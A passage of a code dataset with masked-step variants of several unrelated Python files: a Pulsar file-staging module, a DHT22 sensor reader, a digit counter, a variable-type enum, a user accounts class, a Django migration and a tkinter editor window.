action_dict):\n return RemoteCopyAction(source=action_dict[\"source\"])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, \"rb\"), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, \"rb\") as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = \"remote_transfer\"\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict[\"source\"], url=action_dict[\"url\"])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = \"remote_object_store_copy\"\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict[\"source\"])\n\n def write_to_path(self, path):\n assert self.object_store # Make sure object_store attribute injected\n assert \"object_store_ref\" in self.source\n object_store_ref = self.source[\"object_store_ref\"]\n dataset_object = Bunch(\n id=object_store_ref[\"dataset_id\"],\n uuid=object_store_ref[\"dataset_uuid\"],\n object_store_id=object_store_ref[\"object_store_id\"],\n )\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\"Writing raw files to object store not supported at this time.\")\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(\n ssh_key=UNSET_ACTION_KWD,\n ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD,\n ssh_port=UNSET_ACTION_KWD,\n )\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(\n ssh_user=self.ssh_user,\n ssh_host=self.ssh_host,\n ssh_port=self.ssh_port\n )\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode(\"utf-8\"))\n else:\n raise Exception(\"SSH_KEY not available\")\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = \"remote_rsync_transfer\"\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict[\"source\"],\n ssh_user=action_dict[\"ssh_user\"],\n ssh_host=action_dict[\"ssh_host\"],\n ssh_port=action_dict[\"ssh_port\"],\n ssh_key=action_dict[\"ssh_key\"])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user,\n self.ssh_host, self.ssh_port, key_file)\n\n\nclass ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = \"remote_scp_transfer\"\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict[\"source\"],\n ssh_user=action_dict[\"ssh_user\"],\n ssh_host=action_dict[\"ssh_host\"],\n ssh_port=action_dict[\"ssh_port\"],\n ssh_key=action_dict[\"ssh_key\"])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = \"message\"\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n # Ekkk, cannot be called if created through from_dict.\n # Shouldn't be a problem the way it is used - but is an\n # object design problem.\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict[\"contents\"])\n\n def write_to_path(self, path):\n open(path, \"w\").write(self.contents)\n\n\nDICTIFIABLE_ACTION_CLASSES = [\n RemoteCopyAction,\n RemoteTransferAction,\n MessageAction,\n RsyncTransferAction,\n ScpTransferAction,\n RemoteObjectStoreCopyAction\n]\n\n\ndef from_dict(action_dict):\n action_type = action_dict.get(\"action_type\", None)\n target_class = None\n for action_class in DICTIFIABLE_ACTION_CLASSES:\n if action_type == action_class.action_type:\n target_class = action_class\n if not target_class:\n message = \"Failed to recover action from dictionary - invalid action type specified %s.\" % action_type\n raise Exception(message)\n if \"source\" in action_dict:\n action_dict.pop(\"path\") # remove redundant information stored for backward compatibility.\n elif \"path\" in action_dict:\n # legacy message received from older Pulsar client, pop the path from the dict\n # and convert it to a source.\n source = {\"path\": action_dict.pop(\"path\")}\n action_dict[\"source\"] = source\n return target_class.from_dict(action_dict)\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = \"action_type %s requires key word argument %s\"\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', \"*defaults*\")\n path_types_str = path_types_str.replace(\"*defaults*\", \",\".join(ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace(\"*any*\", \",\".join(ALL_PATH_TYPES))\n self.path_types = path_types_str.split(\",\")\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(\n action=self.action_type,\n path_types=\",\".join(self.path_types),\n match_type=self.match_type\n )\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = r\"({}{}[^\\s,\\\"\\']+)\".format(escape(self.prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\nMAPPER_CLASSES = [PathTypeOnlyMapper, PrefixPathMapper, GlobPathMapper, RegexPathMapper]\nMAPPER_CLASS_DICT = dict(map(lambda c: (c.match_type, c), MAPPER_CLASSES))\n\n\ndef mappers_from_dicts(mapper_def_list):\n return list(map(lambda m: _mappper_from_dict(m), mapper_def_list))\n\n\ndef _mappper_from_dict(mapper_dict):\n if \"path\" in mapper_dict:\n map_type = mapper_dict.get('match_type', DEFAULT_PATH_MAPPER_TYPE)\n else:\n map_type = 'path_type_only'\n return MAPPER_CLASS_DICT[map_type](mapper_dict)\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get(\"depth\", \"0\"))\n\n def to_dict(self):\n return dict(\n depth=self.depth\n )\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\nDEFAULT_FILE_LISTER = FileLister(dict(depth=0))\n\nACTION_CLASSES: List[Type[BaseAction]] = [\n NoneAction,\n RewriteAction,\n TransferAction,\n CopyAction,\n RemoteCopyAction,\n RemoteTransferAction,\n RemoteObjectStoreCopyAction,\n RsyncTransferAction,\n ScpTransferAction,\n]\nactions = {clazz.action_type: clazz for clazz in ACTION_CLASSES}\n\n\n__all__ = (\n 'FileActionMapper',\n 'path_type',\n 'from_dict',\n 'MessageAction',\n 'RemoteTransferAction', # For testing\n)\n", "step-ids": [ 84, 86, 97, 122, 127 ] }
[ 84, 86, 97, 122, 127 ]
import time import DHT22 import pigpio import Sensor class MagicBoxDHT22(object): def DHT22(self): self.s.trigger() time.sleep(0.2) self.tempF=round(self.s.temperature()*1.8+32,2) -3.7 #+adjustment self.humidity=round(self.s.humidity()) def __init__(self): self.pi=pigpio.pi() self.s=DHT22.sensor(self.pi, 4) self.tempF=0 self.humidity=0
normal
{ "blob_id": "179b07870d656fb24b73d8b0a1f76ffed08aa5c2", "index": 9665, "step-1": "<mask token>\n\n\nclass MagicBoxDHT22(object):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass MagicBoxDHT22(object):\n <mask token>\n\n def __init__(self):\n self.pi = pigpio.pi()\n self.s = DHT22.sensor(self.pi, 4)\n self.tempF = 0\n self.humidity = 0\n", "step-3": "<mask token>\n\n\nclass MagicBoxDHT22(object):\n\n def DHT22(self):\n self.s.trigger()\n time.sleep(0.2)\n self.tempF = round(self.s.temperature() * 1.8 + 32, 2) - 3.7\n self.humidity = round(self.s.humidity())\n\n def __init__(self):\n self.pi = pigpio.pi()\n self.s = DHT22.sensor(self.pi, 4)\n self.tempF = 0\n self.humidity = 0\n", "step-4": "import time\nimport DHT22\nimport pigpio\nimport Sensor\n\n\nclass MagicBoxDHT22(object):\n\n def DHT22(self):\n self.s.trigger()\n time.sleep(0.2)\n self.tempF = round(self.s.temperature() * 1.8 + 32, 2) - 3.7\n self.humidity = round(self.s.humidity())\n\n def __init__(self):\n self.pi = pigpio.pi()\n self.s = DHT22.sensor(self.pi, 4)\n self.tempF = 0\n self.humidity = 0\n", "step-5": "import time\nimport DHT22\nimport pigpio\nimport Sensor\n\nclass MagicBoxDHT22(object):\n\n def DHT22(self):\n self.s.trigger()\n time.sleep(0.2)\n self.tempF=round(self.s.temperature()*1.8+32,2) -3.7 #+adjustment\n self.humidity=round(self.s.humidity())\n\n def __init__(self):\n self.pi=pigpio.pi()\n self.s=DHT22.sensor(self.pi, 4)\n self.tempF=0\n self.humidity=0\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
A = int(input()) B = int(input()) C = int(input()) number = A * B * C num = str(number) for i in range(10): # 9를 입력해서 첨에 틀림 ! count = 0 for j in range(len(num)): if i == int(num[j]): count += 1 else: continue print(count)
normal
{ "blob_id": "b43ea8c32207bf43abc3b9b490688fde0706d876", "index": 4633, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n", "step-3": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n", "step-4": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10): # 9를 입력해서 첨에 틀림 !\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n ", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from enum import Enum class VariableType(Enum): uint8 = "uint8", int8 = "int8" uint16 = "uint16" int16 = "int16" uint32 = "uint32" int32 = "int32" float = "float" double = "double" bool = "bool" custom = "custom" class Variable: def __init__(self, type_str: str, name: str): self.original_type = type_str self.__map_variable_type(type_str) self.name = name def __str__(self): return "VariableDto name=" + self.name + " type=" + str(self.type.name) def __map_variable_type(self, variable_type): # TODO add support for short, int, etc. switcher = { "uint8_t": (VariableType.uint8, 1), "int8_t": (VariableType.int8, 1), "uint16_t": (VariableType.uint16, 2), "int16_t": (VariableType.int16, 2), "uint32_t": (VariableType.uint32, 4), "int32_t": (VariableType.int32, 4), "float": (VariableType.float, 4), "double": (VariableType.double, 4), "bool": (VariableType.bool, 1) } self.type, self.size = switcher.get(variable_type, (VariableType.custom, None))
normal
{ "blob_id": "434ec7791345ad869d8ce86aa1cdc08344203171", "index": 2028, "step-1": "<mask token>\n\n\nclass Variable:\n\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return 'VariableDto name=' + self.name + ' type=' + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n switcher = {'uint8_t': (VariableType.uint8, 1), 'int8_t': (\n VariableType.int8, 1), 'uint16_t': (VariableType.uint16, 2),\n 'int16_t': (VariableType.int16, 2), 'uint32_t': (VariableType.\n uint32, 4), 'int32_t': (VariableType.int32, 4), 'float': (\n VariableType.float, 4), 'double': (VariableType.double, 4),\n 'bool': (VariableType.bool, 1)}\n self.type, self.size = switcher.get(variable_type, (VariableType.\n custom, None))\n", "step-2": "<mask token>\n\n\nclass VariableType(Enum):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Variable:\n\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return 'VariableDto name=' + self.name + ' type=' + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n switcher = {'uint8_t': (VariableType.uint8, 1), 'int8_t': (\n VariableType.int8, 1), 'uint16_t': (VariableType.uint16, 2),\n 'int16_t': (VariableType.int16, 2), 'uint32_t': (VariableType.\n uint32, 4), 'int32_t': (VariableType.int32, 4), 'float': (\n VariableType.float, 4), 'double': (VariableType.double, 4),\n 'bool': (VariableType.bool, 1)}\n self.type, self.size = switcher.get(variable_type, (VariableType.\n custom, None))\n", "step-3": "<mask token>\n\n\nclass VariableType(Enum):\n uint8 = 'uint8',\n int8 = 'int8'\n uint16 = 'uint16'\n int16 = 'int16'\n uint32 = 'uint32'\n int32 = 'int32'\n float = 'float'\n double = 'double'\n bool = 'bool'\n custom = 'custom'\n\n\nclass Variable:\n\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return 'VariableDto name=' + self.name + ' type=' + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n switcher = {'uint8_t': (VariableType.uint8, 1), 'int8_t': (\n VariableType.int8, 1), 'uint16_t': (VariableType.uint16, 2),\n 'int16_t': (VariableType.int16, 2), 'uint32_t': (VariableType.\n uint32, 4), 'int32_t': (VariableType.int32, 4), 'float': (\n VariableType.float, 4), 'double': (VariableType.double, 4),\n 'bool': (VariableType.bool, 1)}\n self.type, self.size = switcher.get(variable_type, (VariableType.\n custom, None))\n", "step-4": "from enum import Enum\n\n\nclass VariableType(Enum):\n uint8 = 'uint8',\n int8 = 'int8'\n uint16 = 'uint16'\n int16 = 'int16'\n uint32 = 'uint32'\n int32 = 'int32'\n float = 'float'\n double = 'double'\n bool = 'bool'\n custom = 'custom'\n\n\nclass Variable:\n\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return 'VariableDto name=' + self.name + ' type=' + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n switcher = {'uint8_t': (VariableType.uint8, 1), 'int8_t': (\n VariableType.int8, 1), 'uint16_t': (VariableType.uint16, 2),\n 'int16_t': (VariableType.int16, 2), 'uint32_t': (VariableType.\n uint32, 4), 'int32_t': (VariableType.int32, 4), 'float': (\n VariableType.float, 4), 'double': (VariableType.double, 4),\n 'bool': (VariableType.bool, 1)}\n self.type, self.size = switcher.get(variable_type, (VariableType.\n custom, None))\n", "step-5": "from enum import Enum\n\n\nclass VariableType(Enum):\n uint8 = \"uint8\",\n int8 = \"int8\"\n\n uint16 = \"uint16\"\n int16 = \"int16\"\n\n uint32 = \"uint32\"\n int32 = \"int32\"\n\n float = \"float\"\n double = \"double\"\n bool = \"bool\"\n\n custom = \"custom\"\n\n\nclass Variable:\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return \"VariableDto name=\" + self.name + \" type=\" + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n # TODO add support for short, int, etc.\n switcher = {\n \"uint8_t\": (VariableType.uint8, 1),\n \"int8_t\": (VariableType.int8, 1),\n \"uint16_t\": (VariableType.uint16, 2),\n \"int16_t\": (VariableType.int16, 2),\n \"uint32_t\": (VariableType.uint32, 4),\n \"int32_t\": (VariableType.int32, 4),\n \"float\": (VariableType.float, 4),\n \"double\": (VariableType.double, 4),\n \"bool\": (VariableType.bool, 1)\n }\n self.type, self.size = switcher.get(variable_type, (VariableType.custom, None))\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
from app.exceptions import UserAlreadyExist, UserDoesNotExist class Accounts(object): """ Creates an Account where users can be stored """ def __init__(self): self.users = {} def add_user(self, user): if user.id in self.users: raise UserAlreadyExist else: self.users.update({user.id: user}) def remove_user(self, email): """This Method removes a user from users dictonary using his/her unique email""" try: self.users.pop(email) except KeyError: raise UserDoesNotExist def check_user(self, email): if email in self.users: return self.users[email] def all_users(self): return self.users
normal
{ "blob_id": "88cc4ae4137cf9c0e9c39874b36f7a2770550f96", "index": 5431, "step-1": "<mask token>\n\n\nclass Accounts(object):\n <mask token>\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n <mask token>\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Accounts(object):\n <mask token>\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n <mask token>\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n\n def all_users(self):\n return self.users\n", "step-3": "<mask token>\n\n\nclass Accounts(object):\n <mask token>\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n\n def remove_user(self, email):\n \"\"\"This Method removes a user from users dictonary using his/her\n unique email\"\"\"\n try:\n self.users.pop(email)\n except KeyError:\n raise UserDoesNotExist\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n\n def all_users(self):\n return self.users\n", "step-4": "<mask token>\n\n\nclass Accounts(object):\n \"\"\" Creates an Account where users can be stored \"\"\"\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n\n def remove_user(self, email):\n \"\"\"This Method removes a user from users dictonary using his/her\n unique email\"\"\"\n try:\n self.users.pop(email)\n except KeyError:\n raise UserDoesNotExist\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n\n def all_users(self):\n return self.users\n", "step-5": "from app.exceptions import UserAlreadyExist, UserDoesNotExist\n\nclass Accounts(object):\n \"\"\" Creates an Account where users can be stored \"\"\"\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n \n def remove_user(self, email):\n \"\"\"This Method removes a user from users dictonary using his/her\n unique email\"\"\"\n try:\n self.users.pop(email)\n except KeyError:\n raise UserDoesNotExist\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n\n def all_users(self):\n return self.users", "step-ids": [ 4, 5, 6, 7, 9 ] }
[ 4, 5, 6, 7, 9 ]
# Generated by Django 3.0 on 2019-12-15 16:20 import datetime from django.db import migrations, models from django.utils.timezone import utc class Migration(migrations.Migration): dependencies = [ ('blog', '0013_auto_20191215_1619'), ] operations = [ migrations.AlterField( model_name='categorie', name='utimestamp', field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 660603, tzinfo=utc)), ), migrations.AlterField( model_name='post', name='create_date', field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 657811, tzinfo=utc)), ), migrations.AlterField( model_name='tag', name='utimestamp', field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 663436, tzinfo=utc)), ), ]
normal
{ "blob_id": "38a79f5b3ce1beb3dc1758880d42ceabc800ece7", "index": 8818, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0013_auto_20191215_1619')]\n operations = [migrations.AlterField(model_name='categorie', name=\n 'utimestamp', field=models.DateTimeField(default=datetime.datetime(\n 2019, 12, 15, 16, 20, 14, 660603, tzinfo=utc))), migrations.\n AlterField(model_name='post', name='create_date', field=models.\n DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, \n 657811, tzinfo=utc))), migrations.AlterField(model_name='tag', name\n ='utimestamp', field=models.DateTimeField(default=datetime.datetime\n (2019, 12, 15, 16, 20, 14, 663436, tzinfo=utc)))]\n", "step-4": "import datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0013_auto_20191215_1619')]\n operations = [migrations.AlterField(model_name='categorie', name=\n 'utimestamp', field=models.DateTimeField(default=datetime.datetime(\n 2019, 12, 15, 16, 20, 14, 660603, tzinfo=utc))), migrations.\n AlterField(model_name='post', name='create_date', field=models.\n DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, \n 657811, tzinfo=utc))), migrations.AlterField(model_name='tag', name\n ='utimestamp', field=models.DateTimeField(default=datetime.datetime\n (2019, 12, 15, 16, 20, 14, 663436, tzinfo=utc)))]\n", "step-5": "# Generated by Django 3.0 on 2019-12-15 16:20\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0013_auto_20191215_1619'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='categorie',\n name='utimestamp',\n field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 660603, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='post',\n name='create_date',\n field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 657811, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='tag',\n name='utimestamp',\n field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 663436, tzinfo=utc)),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from tkinter import * from tkinter import messagebox as mb from tkinter.scrolledtext import ScrolledText from tkinter import filedialog as fd from child_window import ChildWindow # from PIL import Image as PilImage # from PIL import ImageTk, ImageOps class Window: def __init__(self, width, height, title="MyWindow", resizable=(False, False), icon=r"resources/feather.ico"): self.root = Tk() self.root.title(title) # self.root.geometry(f"{width}x{height}+200+200") self.root.geometry("+600+300") # self.root.resizable(resizable[0], resizable[1]) if icon: self.root.iconbitmap(icon) self.text = ScrolledText(self.root) def run(self): self.draw_widgets() self.root.mainloop() def draw_widgets(self): self.draw_menu() self.text.pack() def draw_menu(self): menu_bar = Menu(self.root) file_menu = Menu(menu_bar, tearoff=0) file_menu.add_command(label="Открыть", command=self.open_file) file_menu.add_command(label="Сохранить как", command=self.save_file) file_menu.add_command(label="Отркыть папку", command=self.open_dir) file_menu.add_separator() file_menu.add_command(label="Выйти", command=self.exit) info_menu = Menu(menu_bar, tearoff=0) info_menu.add_command(label="О приложении", command=self.show_info) menu_bar.add_cascade(label="Файл", menu=file_menu) menu_bar.add_cascade(label="Справка", menu=info_menu) self.root.configure(menu=menu_bar) def open_file(self): # wanted_files = ( # ("IMAGES", "*.jpeg;*.png;*.gif"), # ("TEXT files", "*.txt;*.log"), # ("PY files", "*.py"), # ("ALL", "*.*") # ) # # file_name = fd.askopenfilename(initialdir="D:/", title="FIND A FILE", filetypes=wanted_files) # self.text.insert(END, f"Надо открыть файл: {file_name}\nСодержимое:\n") # if file_name: # with open(file_name, "r") as f: # self.text.insert(END, f.read()) # file = fd.askopenfile() # self.text.insert(END, file.read()) # file.close() file_names = fd.askopenfilenames() self.text.insert(END, str(file_names)) def save_file(self): name = fd.asksaveasfilename(filetypes=(("TEXT files", "*.txt"), ("Py files", "*.py"))) if name: self.text.insert(END, f"Сохранить файл по пути {name}\n") # with open(name, "w") as f: # f.write("123") # file = fd.asksaveasfile() # file.write("123") # file.close() def open_dir(self): path = fd.askdirectory(mustexist=True) self.text.insert(END, f"Папка {path}\n") def show_info(self): mb.showinfo("Информация", "Лучшее графическое приложение на свете") def exit(self): choice = mb.askyesno("Quit", "Do you want to quit?") if choice: self.root.destroy() def create_child(self, width, height, title="Child", resizable=(False, False), icon=None): ChildWindow(self.root, width, height, title, resizable, icon) if __name__ == "__main__": window = Window(500, 500, "TKINTER") # window.create_child(200, 100) window.run()
normal
{ "blob_id": "02d4e1ddb0b4cf75c9902e13263c5a80417de01b", "index": 6530, "step-1": "<mask token>\n\n\nclass Window:\n\n def __init__(self, width, height, title='MyWindow', resizable=(False, \n False), icon='resources/feather.ico'):\n self.root = Tk()\n self.root.title(title)\n self.root.geometry('+600+300')\n if icon:\n self.root.iconbitmap(icon)\n self.text = ScrolledText(self.root)\n <mask token>\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label='Открыть', command=self.open_file)\n file_menu.add_command(label='Сохранить как', command=self.save_file)\n file_menu.add_command(label='Отркыть папку', command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label='Выйти', command=self.exit)\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label='О приложении', command=self.show_info)\n menu_bar.add_cascade(label='Файл', menu=file_menu)\n menu_bar.add_cascade(label='Справка', menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=(('TEXT files', '*.txt'), (\n 'Py files', '*.py')))\n if name:\n self.text.insert(END, f'Сохранить файл по пути {name}\\n')\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f'Папка {path}\\n')\n <mask token>\n <mask token>\n\n def create_child(self, width, height, title='Child', resizable=(False, \n False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Window:\n\n def __init__(self, width, height, title='MyWindow', resizable=(False, \n False), icon='resources/feather.ico'):\n self.root = Tk()\n self.root.title(title)\n self.root.geometry('+600+300')\n if icon:\n self.root.iconbitmap(icon)\n self.text = ScrolledText(self.root)\n <mask token>\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label='Открыть', command=self.open_file)\n file_menu.add_command(label='Сохранить как', command=self.save_file)\n file_menu.add_command(label='Отркыть папку', command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label='Выйти', command=self.exit)\n 